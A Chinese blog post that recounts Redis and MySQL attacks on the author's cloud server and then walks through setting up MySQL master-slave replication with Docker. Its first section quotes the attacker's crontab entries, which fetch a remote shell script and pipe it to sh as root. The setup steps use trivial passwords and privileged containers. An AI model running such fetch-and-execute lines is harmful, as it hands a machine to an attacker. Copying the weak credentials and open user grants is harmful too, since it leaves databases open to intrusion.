前言
最近华为云云耀云服务器L实例上新,也搞了一台来玩,期间遇到过MySQL数据库被攻击的情况,数据丢失,还好我有几份备份,没有造成太大的损失;后来有发现Redis数据库被攻击的情况,加入了redis密码初步解决问题。总之就是各种遭受毒打。。。
本篇博客回顾Redis的未授权访问漏洞,介绍MySQL主从集群的搭建,以及相关的配置
其他相关的华为云云耀云服务器L实例评测文章列表如下:
引出
1.redis数据安全的简单回顾;
2.MySQL主从搭建的流程和注意事项;
3.主从不同步的剞劂,以及只读权限的设置;
一、redis数据安全的问题
1.之前被攻击留下的痕迹
*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh
*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh
*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh
*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh
2.攻击命令的解读
root wget -q -O- 是一个有效的命令。它使用wget命令来下载一个文件,并将其输出到标准输出(stdout)。
root表示以 root 用户身份执行该命令。wget是一个用于从网络上下载文件的命令行工具。-q选项表示静默模式,即不显示下载进度和其他信息。-O-选项表示将下载的文件输出到标准输出(stdout)。
这个命令通常用于下载文件并将其传递给其他命令进行处理,或者将文件内容重定向到其他地方进行保存或处理。
root curl -fsSL 是一个有效的命令。它使用curl命令来从指定的URL下载文件,并将其输出到标准输出(stdout)。
root表示以 root 用户身份执行该命令。curl是一个用于从网络上获取数据的命令行工具。-fsSL是一些选项,具体含义如下:-f选项表示在下载文件时,如果服务器返回错误状态码,不显示错误信息。-s选项表示静默模式,即不显示进度和其他信息。-S选项表示在发生错误时显示错误信息。-L选项表示跟随重定向,即如果服务器返回重定向响应,自动跳转到新的URL。
这个命令通常用于下载文件并将其传递给其他命令进行处理,或者将文件内容重定向到其他地方进行保存或处理。
二、MySQL主从本地搭建
由于MySQL主从的搭建相比Redis主从搭建还是要复杂很多的,之前几次尝试都失败,最后终于搭建成功,因此先介绍如何在本地虚拟机中搭建主从。
1.挂载启动主MySQL
docker run
- -i:以交互模式运行容器
- -t:为容器重新分配一个伪输入终端
- —name :容器名称
- —privileged: 设置容器公开权限(默认为true)
- -p :映射端口 linux端口: 容器内置端口(mysql默认端口为3306)
- -v : linux挂载文件夹/文件和容器内路径的映射
- -e: 容器的环境变量(设置mysql默认用户名&密码)
- -d: 后台运行容器,并返回容器ID
docker run -it \
--name mysql_3316 \
--privileged \
-p 3316:3306 \
-v /usr/local/software/mysql/3316/conf/my.cnf:/etc/mysql/my.cnf \
-v /usr/local/software/mysql/3316/data:/var/lib/mysql \
-v /usr/local/software/mysql/3316/mysql-files:/var/lib/mysql-files \
-e MYSQL_ROOT_PASSWORD=123 \
-d mysql
mysql日志文件容器中的位置
mysql的主的状态,binlog日志文件名,以及位置
主从搭建的前提条件,binlog日志文件开启,MySQL8以上默认开启
mysql> show variables like 'log_%';
+----------------------------------------+----------------------------------------+
| Variable_name | Value |
+----------------------------------------+----------------------------------------+
| log_bin | ON |
| log_bin_basename | /var/lib/mysql/binlog |
| log_bin_index | /var/lib/mysql/binlog.index |
| log_bin_trust_function_creators | OFF |
| log_bin_use_v1_row_events | OFF |
| log_error | stderr |
| log_error_services | log_filter_internal; log_sink_internal |
| log_error_suppression_list | |
| log_error_verbosity | 2 |
| log_output | FILE |
| log_queries_not_using_indexes | OFF |
| log_raw | OFF |
| log_replica_updates | ON |
| log_slave_updates | ON |
| log_slow_admin_statements | OFF |
| log_slow_extra | OFF |
| log_slow_replica_statements | OFF |
| log_slow_slave_statements | OFF |
| log_statements_unsafe_for_binlog | ON |
| log_throttle_queries_not_using_indexes | 0 |
| log_timestamps | UTC |
+----------------------------------------+----------------------------------------+
21 rows in set (0.00 sec)
mysql>
在Navicat中也可以看
2.修改主的配置文件
server_id=200
log_bin=mysql-bin
binlog_format=row
主要的配置项如下所示
[mysqld]
pid-file =/var/run/mysqld/mysqld.pid
socket =/var/run/mysqld/mysqld.sock
datadir =/var/lib/mysql
secure-file-priv = NULL
default-authentication-plugin=mysql_native_password
# customer config here
!includedir /etc/mysql/conf.d/
server_id = 200
检验:挂载启动的配置是否生效
mysql> show master status;
+---------------+----------+--------------+------------------+-------------------+
| File | Position | Binlog_Do_DB | Binlog_Ignore_DB | Executed_Gtid_Set |
+---------------+----------+--------------+------------------+-------------------+
| binlog.000002 | 157 | | | |
+---------------+----------+--------------+------------------+-------------------+
1 row in set (0.00 sec)
mysql> show variables like 'server_id';
+---------------+-------+
| Variable_name | Value |
+---------------+-------+
| server_id | 200 |
+---------------+-------+
1 row in set (0.00 sec)
再修改一下binlog日志文件的文件名
server_id = 209
log_bin=mysql-bin
binlog-format=row
说明挂载启动成功
mysql> show master status;
+------------------+----------+--------------+------------------+-------------------+
| File | Position | Binlog_Do_DB | Binlog_Ignore_DB | Executed_Gtid_Set |
+------------------+----------+--------------+------------------+-------------------+
| mysql-bin.000001 | 157 | | | |
+------------------+----------+--------------+------------------+-------------------+
1 row in set (0.00 sec)
mysql> show variables like 'server_id';
+---------------+-------+
| Variable_name | Value |
+---------------+-------+
| server_id | 209 |
+---------------+-------+
1 row in set (0.01 sec)
-- 1.创建从用户slave
CREATE USER 'slave'@'%' IDENTIFIED WITH mysql_native_password by '567';
-- 2.给用户授权
GRANT replication slave,replication client ON *.* TO 'slave'@'%';
-- 3.应用权限
FLUSH PRIVILEGES;
3.在主MySQL中创建slave用户
创建一个slave用户
新增从用户的加密方式
后面配置从需要的参数
该部分全部操作
4.挂载启动从MySQL
从的配置文件
server_id = 211
log_bin=mysql-slave01-bin
relay_log=pet-relay-bin
read_only=1
docker run -it \
--name mysql_3320 \
--privileged \
-p 3320:3306 \
-v /usr/local/software/mysql/3320/conf/my.cnf:/etc/mysql/my.cnf \
-v /usr/local/software/mysql/3320/data:/var/lib/mysql \
-v /usr/local/software/mysql/3320/mysql-files:/var/lib/mysql-files \
-e MYSQL_ROOT_PASSWORD=123 \
-d mysql
开放端口
firewall-cmd --zone=public --add-port=3320/tcp --permanent
firewall-cmd --reload
firewall-cmd --zone=public --list-ports
5.在从salve中建立主从关系
主的内部端口号
[root@localhost ~]# docker inspect mysql_3316 | grep IPA
"SecondaryIPAddresses": null,
"IPAddress": "172.17.0.3",
"IPAMConfig": null,
"IPAddress": "172.17.0.3",
[root@localhost ~]#
主的bin-log相关配置
change master to master_host='172.17.0.3',
master_user='slave',master_password='567',
MASTER_LOG_FILE='mysql-bin.000001',
MASTER_LOG_POS=856
进行参数的配置
6.在从slave中查看主从状态
mysql> change master to master_host='172.17.0.3',
-> master_user='slave',master_password='567',
-> MASTER_LOG_FILE='mysql-bin.000001',
-> MASTER_LOG_POS=856;
Query OK, 0 rows affected, 8 warnings (0.02 sec)
mysql> start slave;
Query OK, 0 rows affected, 1 warning (0.01 sec)
mysql> show slave status \G;
*************************** 1. row ***************************
Slave_IO_State: Waiting for source to send event
Master_Host: 172.17.0.3
Master_User: slave
Master_Port: 3306
Connect_Retry: 60
Master_Log_File: mysql-bin.000001
Read_Master_Log_Pos: 856
Relay_Log_File: eafddc4554f6-relay-bin.000002
Relay_Log_Pos: 326
Relay_Master_Log_File: mysql-bin.000001
Slave_IO_Running: Yes
Slave_SQL_Running: Yes
三、在华为云上搭建主从
1.准备主从文件夹,上传配置文件
上传附件中配置文件到conf文件夹
2.开放响应的端口
firewall-cmd --zone=public --add-port=3316/tcp --permanent
firewall-cmd --reload
firewall-cmd --zone=public --list-ports
3.挂载启动运行主master
挂载启动的命令
docker run -it \
--name mysql_3316 \
--privileged \
-p 3316:3306 \
-v /usr/local/software/mysql1/3316/conf/my.cnf:/etc/mysql/my.cnf \
-v /usr/local/software/mysql1/3316/data:/var/lib/mysql \
-v /usr/local/software/mysql1/3316/mysql-files:/var/lib/mysql-files \
-e MYSQL_ROOT_PASSWORD=123 \
-d mysql
确认一下binlog是否开启
在my.cnf配置文件中增加配置
4.在主master中建立从slave用户
CREATE USER 'slave'@'%' IDENTIFIED WITH mysql_native_password by '567';
GRANT replication slave,replication client ON *.* TO 'slave'@'%';
FLUSH PRIVILEGES;
5.挂载自动从slave
docker run -it \
--name mysql_3320 \
--privileged \
-p 3320:3306 \
-v /usr/local/software/mysql1/3320/conf/my.cnf:/etc/mysql/my.cnf \
-v /usr/local/software/mysql1/3320/data:/var/lib/mysql \
-v /usr/local/software/mysql1/3320/mysql-files:/var/lib/mysql-files \
-e MYSQL_ROOT_PASSWORD=123 \
-d mysql
开放一下端口
6.在slave中建立主从关系
获得主的内部ip地址
root@hcss-ecs-52b8:~# docker inspect mysql_3316 | grep IPA
"SecondaryIPAddresses": null,
"IPAddress": "172.17.0.3",
"IPAMConfig": null,
"IPAddress": "172.17.0.3",
获得主的相关参数
show variables like 'log_%';
show master status;
show variables like 'server_id';
建立主从关系
change master to master_host='172.17.0.3',
master_user='slave',master_password='567',
MASTER_LOG_FILE='mysql-bin.000001',
MASTER_LOG_POS=841
记得启动从slave
四、一些问题及其解决
1.从数据不同步的解决
-- 如果主从同步失效,在不能使用的从输入命令
STOP slave;
RESET slave;
START slave;
2.限制从的权限:创建一个只读的从用户
CREATE USER 'rdb'@'%' IDENTIFIED WITH mysql_native_password by '123';
GRANT SELECT ON *.* TO 'rdb'@'%';
FLUSH PRIVILEGES;
创建只允许读的rdb用户
在Navicat中用rdb只读用户登陆,操作命令被拒绝
附件my.cnf配置文件
# For advice on how to change settings please see
# http://dev.mysql.com/doc/refman/8.0/en/server-configuration-defaults.html
#
# Remove leading # and set to the amount of RAM for the most important data
# cache in MySQL. Start at 70% of total RAM for dedicated server, else 10%.
# innodb_buffer_pool_size = 128M
#
# Remove leading # to turn on a very important data integrity option: logging
# changes to the binary log between backups.
# log_bin
#
# Remove leading # to set options mainly useful for reporting servers.
# The server defaults are faster for transactions and fast SELECTs.
# Adjust sizes as needed, experiment to find the optimal values.
# join_buffer_size = 128M
# sort_buffer_size = 2M
# read_rnd_buffer_size = 2M
# Remove leading # to revert to previous value for default_authentication_plugin,
# this will increase compatibility with older clients. For background, see:
# https://dev.mysql.com/doc/refman/8.0/en/server-system-variables.html#sysvar_default_authentication_plugin
# default-authentication-plugin=mysql_native_password
# skip-host-cache
# skip-name-resolve
# socket=/var/run/mysqld/mysqld.sock
# secure-file-priv=/var/lib/mysql-files
# user=mysql
[mysqld]
pid-file =/var/run/mysqld/mysqld.pid
socket =/var/run/mysqld/mysqld.sock
datadir =/var/lib/mysql
secure-file-priv = NULL
default-authentication-plugin=mysql_native_password
# customer config here
!includedir /etc/mysql/conf.d/
server_id = 200
总结
1.redis数据安全的简单回顾;
2.MySQL主从搭建的流程和注意事项;
3.主从不同步的剞劂,以及只读权限的设置;